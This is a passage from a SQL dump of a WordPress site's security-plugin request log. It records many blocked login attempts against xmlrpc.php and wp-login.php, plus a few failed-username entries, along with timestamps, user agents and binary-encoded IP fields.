x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10848,0.000000,1631065529.818348,'\0\0\0\0\0\0\0\0\0\0����y�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10849,0.000000,1631065544.919908,'\0\0\0\0\0\0\0\0\0\0����؛',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10850,0.000000,1631066313.516377,'\0\0\0\0\0\0\0\0\0\0��6\'iX',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10851,0.000000,1631066318.466514,'\0\0\0\0\0\0\0\0\0\0��\rQ(',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10852,0.000000,1631067092.238888,'\0\0\0\0\0\0\0\0\0\0��o���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10853,0.000000,1631067110.468089,'\0\0\0\0\0\0\0\0\0\0��P8',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10854,0.000000,1631067901.557428,'\0\0\0\0\0\0\0\0\0\0����X�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10855,0.000000,1631068661.937845,'\0\0\0\0\0\0\0\0\0\0��ár�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10856,0.000000,1631068684.545800,'\0\0\0\0\0\0\0\0\0\0��m�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10857,0.000000,1631069305.547359,'\0\0\0\0\0\0\0\0\0\0��C��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10858,0.000000,1631069306.138996,'\0\0\0\0\0\0\0\0\0\0���ً',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10859,0.000000,1631069820.827602,'\0\0\0\0\0\0\0\0\0\0����w�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10860,0.000000,1631069830.420610,'\0\0\0\0\0\0\0\0\0\0����Z�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10861,0.000000,1631070382.423732,'\0\0\0\0\0\0\0\0\0\0��\r^�,',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10862,0.000000,1631070363.195752,'\0\0\0\0\0\0\0\0\0\0���;!�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10863,0.000000,1631070784.296994,'\0\0\0\0\0\0\0\0\0\0��g|]�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10864,0.000000,1631070788.805202,'\0\0\0\0\0\0\0\0\0\0���F�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10865,0.000000,1631071262.186358,'\0\0\0\0\0\0\0\0\0\0��gzj�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10866,0.000000,1631071273.663147,'\0\0\0\0\0\0\0\0\0\0��#ÇC',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10867,0.000000,1631071710.125624,'\0\0\0\0\0\0\0\0\0\0��e%�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10868,0.000000,1631071725.364958,'\0\0\0\0\0\0\0\0\0\0���Dm',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10869,0.000000,1631072151.864950,'\0\0\0\0\0\0\0\0\0\0���b�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10870,0.000000,1631072186.038278,'\0\0\0\0\0\0\0\0\0\0���Hݾ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10871,0.000000,1631072621.842756,'\0\0\0\0\0\0\0\0\0\0��\"{3',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10872,0.000000,1631072626.947298,'\0\0\0\0\0\0\0\0\0\0����Dy',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10873,0.000000,1631073088.658031,'\0\0\0\0\0\0\0\0\0\0���\r�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10874,0.000000,1631073088.640735,'\0\0\0\0\0\0\0\0\0\0��3�8�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10875,0.000000,1631073528.387960,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10876,0.000000,1631073538.363567,'\0\0\0\0\0\0\0\0\0\0���Go',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10877,0.000000,1631073995.444588,'\0\0\0\0\0\0\0\0\0\0��X�$�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10878,0.000000,1631073996.106063,'\0\0\0\0\0\0\0\0\0\0���Ҝ4',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10879,0.000000,1631074433.556645,'\0\0\0\0\0\0\0\0\0\0��\r$n�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10880,0.000000,1631074438.112223,'\0\0\0\0\0\0\0\0\0\0���c/',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10881,0.000000,1631074866.098965,'\0\0\0\0\0\0\0\0\0\0���:�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10882,0.000000,1631074881.055323,'\0\0\0\0\0\0\0\0\0\0���_�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10883,0.000000,1631075332.754399,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10884,0.000000,1631075336.330604,'\0\0\0\0\0\0\0\0\0\0��h��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10885,0.000000,1631075748.611701,'\0\0\0\0\0\0\0\0\0\0��>��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10886,0.000000,1631075772.474187,'\0\0\0\0\0\0\0\0\0\0��g�\n�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10887,0.000000,1631076196.641650,'\0\0\0\0\0\0\0\0\0\0��gt�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10888,0.000000,1631076215.976129,'\0\0\0\0\0\0\0\0\0\0��[���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10889,0.000000,1631076648.193213,'\0\0\0\0\0\0\0\0\0\0���,�7',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10890,0.000000,1631076648.699483,'\0\0\0\0\0\0\0\0\0\0���.yB',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10891,0.000000,1631077053.620296,'\0\0\0\0\0\0\0\0\0\0���\n',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10892,0.000000,1631077086.611532,'\0\0\0\0\0\0\0\0\0\0��[��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10893,0.000000,1631077534.220224,'\0\0\0\0\0\0\0\0\0\0���_nq',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10894,0.000000,1631077541.015604,'\0\0\0\0\0\0\0\0\0\0��/���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10895,0.000000,1631077960.158571,'\0\0\0\0\0\0\0\0\0\0��£�#',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10896,0.000000,1631077966.520361,'\0\0\0\0\0\0\0\0\0\0��H8�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10897,0.000000,1631078383.853587,'\0\0\0\0\0\0\0\0\0\0�����9',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(10898,0.000000,1631078426.979062,'\0\0\0\0\0\0\0\0\0\0���3�:',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10899,0.000000,1631078854.413294,'\0\0\0\0\0\0\0\0\0\0��\"DaF',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(10900,0.000000,1631078855.866880,'\0\0\0\0\0\0\0\0\0\0��_���',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(10901,0.000000,1631079313.829569,'\0\0\0\0\0\0\0\0\0\0��>��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10902,0.000000,1631079315.412231,'\0\0\0\0\0\0\0\0\0\0����-�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10903,0.000000,1631079764.368667,'\0\0\0\0\0\0\0\0\0\0��-@6�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10904,0.000000,1631079779.097230,'\0\0\0\0\0\0\0\0\0\0��6\'1�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10905,0.000000,1631080225.094295,'\0\0\0\0\0\0\0\0\0\0��[���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10906,0.000000,1631080235.275848,'\0\0\0\0\0\0\0\0\0\0�����Q',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10907,0.000000,1631080676.007915,'\0\0\0\0\0\0\0\0\0\0���Q֨',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10908,0.000000,1631080702.885797,'\0\0\0\0\0\0\0\0\0\0��3Y��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10909,0.000000,1631081180.313552,'\0\0\0\0\0\0\0\0\0\0����E�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10910,0.000000,1631081199.149392,'\0\0\0\0\0\0\0\0\0\0��Vh\'�',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(10911,0.000000,1631081659.457951,'\0\0\0\0\0\0\0\0\0\0���\0�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10912,0.000000,1631081667.358077,'\0\0\0\0\0\0\0\0\0\0���Q�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10913,0.000000,1631082122.549690,'\0\0\0\0\0\0\0\0\0\0��/�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10914,0.000000,1631082149.307969,'\0\0\0\0\0\0\0\0\0\0���q��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10915,0.000000,1631082624.902278,'\0\0\0\0\0\0\0\0\0\0��?�)',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10916,0.000000,1631082643.965973,'\0\0\0\0\0\0\0\0\0\0��3D(',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10917,0.000000,1631083113.620571,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10918,0.000000,1631083124.284375,'\0\0\0\0\0\0\0\0\0\0����-�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10919,0.000000,1631083601.376970,'\0\0\0\0\0\0\0\0\0\0��k�g�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10920,0.000000,1631083606.278295,'\0\0\0\0\0\0\0\0\0\0���#y�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10921,0.000000,1631084098.508417,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10922,0.000000,1631084099.657886,'\0\0\0\0\0\0\0\0\0\0���쬺',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10923,0.000000,1631084589.947314,'\0\0\0\0\0\0\0\0\0\0����kQ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10924,0.000000,1631084606.142755,'\0\0\0\0\0\0\0\0\0\0���ф',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10925,0.000000,1631085088.468619,'\0\0\0\0\0\0\0\0\0\0��gt�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10926,0.000000,1631085101.300715,'\0\0\0\0\0\0\0\0\0\0��g�t2',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10927,0.000000,1631085581.993097,'\0\0\0\0\0\0\0\0\0\0��>��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10928,0.000000,1631085612.014541,'\0\0\0\0\0\0\0\0\0\0��#ÇC',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10929,0.000000,1631086127.030141,'\0\0\0\0\0\0\0\0\0\0���V|�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10930,0.000000,1631086632.153257,'\0\0\0\0\0\0\0\0\0\0��/jv�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10931,0.000000,1631086652.563659,'\0\0\0\0\0\0\0\0\0\0��gyY�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10932,0.000000,1631087157.150248,'\0\0\0\0\0\0\0\0\0\0����y�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10933,0.000000,1631087166.816267,'\0\0\0\0\0\0\0\0\0\0���i',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10934,0.000000,1631101668.479340,'\0\0\0\0\0\0\0\0\0\0��%�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10935,0.000000,1631108675.520057,'\0\0\0\0\0\0\0\0\0\0��^�g',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10936,0.000000,1631163998.482585,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10937,0.000000,1631164397.835389,'\0\0\0\0\0\0\0\0\0\0��#��C',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10938,0.000000,1631165863.456511,'\0\0\0\0\0\0\0\0\0\0��R�,�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10939,0.000000,1631166274.069758,'\0\0\0\0\0\0\0\0\0\0��\r���',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10940,0.000000,1631167784.387295,'\0\0\0\0\0\0\0\0\0\0�����_',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security 